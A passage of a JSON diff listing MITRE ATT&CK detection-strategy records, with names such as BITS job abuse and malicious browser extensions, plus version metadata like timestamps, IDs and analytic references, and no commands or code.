+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.673000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0488",
+                            "external_id": "DET0488"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect abuse of Trusted Relationships (third-party and delegated admin access)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--46630fc8-75de-4b73-b46e-0a4eeb7ad310",
+                        "x-mitre-analytic--e19cbf11-fabf-4dfd-aeb2-1c62660ebd8f",
+                        "x-mitre-analytic--7c28e2f5-c944-4974-810f-81bcfdc8b6cc",
+                        "x-mitre-analytic--f0e2baa2-3bb7-4587-8eae-6abddd1cf140",
+                        "x-mitre-analytic--c526f8c1-95ec-494f-b7bf-49a95a803f2a",
+                        "x-mitre-analytic--4766bdc0-047a-4250-93c1-6d907178620e",
+                        "x-mitre-analytic--b5985d46-1d54-4a6d-81c8-0b577b5d8d17"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.673000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--de9fde27-426b-4cb1-afcd-dbe1f7d4273f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0098",
+                            "external_id": "DET0098"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect abuse of Windows BITS Jobs for download, execution and persistence",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--6fba9520-c6ce-4a8f-8005-d33546a10406"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--759a29fb-8697-46f7-baa3-a891b28c064e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0507",
+                            "external_id": "DET0507"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect browser session hijacking via privilege, handle access, and remote thread into browsers",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c3629243-7cd6-4e56-9275-73f5752f0f08"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--434d1a09-6a53-43ae-8f8c-e0eb853c4a25",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0561",
+                            "external_id": "DET0561"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect malicious IDE extension install/usage and IDE tunneling",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--539a4182-ab9e-4abf-a83b-f30cf2dec770",
+                        "x-mitre-analytic--4dff3c9a-4730-46de-af2f-dfa86b249167",
+                        "x-mitre-analytic--77d3146f-2066-40a9-872e-ec05d7a4d6d1"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5ac0e527-2ebd-44a1-8d87-4de8463b761c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0125",
+                            "external_id": "DET0125"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect persistence via reopened application plist modification (macOS)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--67d1900f-9e02-4290-a14c-6d32be508d19"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--81ac26e4-c4f6-4368-842f-50033ca8522b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0473",
+                            "external_id": "DET0473"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect persistent or elevated container services via container runtime or cluster manipulation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--de64bfbd-a6ed-4674-b0c5-dd485cba943b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--fbac07bf-65d5-4222-88bb-0ef798417ebb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0225",
+                            "external_id": "DET0225"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect unauthorized LSASS driver persistence via LSA plugin abuse (Windows)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5028303d-22d6-490c-b053-015e877d5829"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e8d186eb-5450-4dc9-8458-89bbaed45643",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0069",
+                            "external_id": "DET0069"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect unauthorized or suspicious Hardware Additions (USB/Thunderbolt/Network)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--61d89912-f74e-4fde-ae7a-591e8c7c5739",
+                        "x-mitre-analytic--81cd2610-bc6c-46bf-8d3c-d6e30c7f51c8",
+                        "x-mitre-analytic--5bbe0089-4927-4415-bff7-14a3ba5543c0"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--9c03f003-b859-42c6-b16d-c0979dfc202b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0361",
+                            "external_id": "DET0361"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detecting .NET COM Registration Abuse via Regsvcs/Regasm",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a5e9fb06-ab75-415d-beff-206aa059e096"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--960d6663-6a7f-4f95-affe-a28d71afc7d9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0500",
+                            "external_id": "DET0500"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detecting Abnormal SharePoint Data Mining by Privileged or Rare Users",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--afb1860a-e29a-4ce8-9524-ab371c5f8d4f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--574968c5-ca49-4005-958f-c3ea5a78cfbc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0263",
+                            "external_id": "DET0263"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detecting Bulk or Anomalous Access to Private Code Repositories via SaaS Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0aa20e10-ec46-4acf-810e-e8ed038d7744"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--621ecbd0-a183-4dbd-913c-656436e62c1d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0433",
+                            "external_id": "DET0433"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detecting Code Injection via mavinject.exe (App-V Injector)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0fff438f-1aa9-4424-be94-a08b400adcb0"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--63d80d1b-ca5b-427d-b603-cf65e6e245b9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0350",
+                            "external_id": "DET0350"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detecting Downgrade Attacks",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e61d2099-1517-4bf4-b2e6-6e61cdf94be3",
+                        "x-mitre-analytic--54eb86ed-2a72-41a8-b060-2750c2fee758",
+                        "x-mitre-analytic--08a391a7-1ce6-4f11-b060-fca06ef03328"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d41df11d-b2cd-4afc-89a5-9c77e7f31985",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0025",
+                            "external_id": "DET0025"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detecting Electron Application Abuse for Proxy Execution",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--dc0bf4ca-1d65-46ee-b4b1-d8f73a6e0cda",
+                        "x-mitre-analytic--8129e7b8-eaa1-4459-ba70-ebf6d68ca16c",
+                        "x-mitre-analytic--f2c91a4c-1e79-4350-8a7e-94bc7b7b9a4c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--bb40d0a9-b35b-4adc-8a69-a3002d53f5f7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.690000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0011",
+                            "external_id": "DET0011"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detecting Junk Data in C2 Channels via Behavioral Analysis",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3e852bb9-785d-4bc4-9f7e-b7e43a5d8bc8",
+                        "x-mitre-analytic--4c7d92bb-4b46-44e4-b070-43c46d3193c4",
+                        "x-mitre-analytic--0519edaf-6485-40b2-8b91-13db29fb8cb8",
+                        "x-mitre-analytic--d3bad85b-9e86-4de8-9e4a-1666133af782"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.690000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f4560945-d62f-48b6-ae94-dcd93c471c45",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0222",
+                            "external_id": "DET0222"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detecting MMC (.msc) Proxy Execution and Malicious COM Activation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e6f38f76-4e60-4b8a-881c-5d3f206e912c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--101e19ca-f902-4c2d-8ceb-ddd07a43f1a7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0044",
+                            "external_id": "DET0044"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detecting Malicious Browser Extensions Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--db45c19b-d9d6-4794-8b49-ba232cca34b0",
+                        "x-mitre-analytic--41153f33-d415-4e1d-b3c8-7333b2f1915e",
+                        "x-mitre-analytic--b5020e23-475e-4f74-a943-787e090d3e2f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8d06728f-5b50-4925-a05c-4d56b17ba5d2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
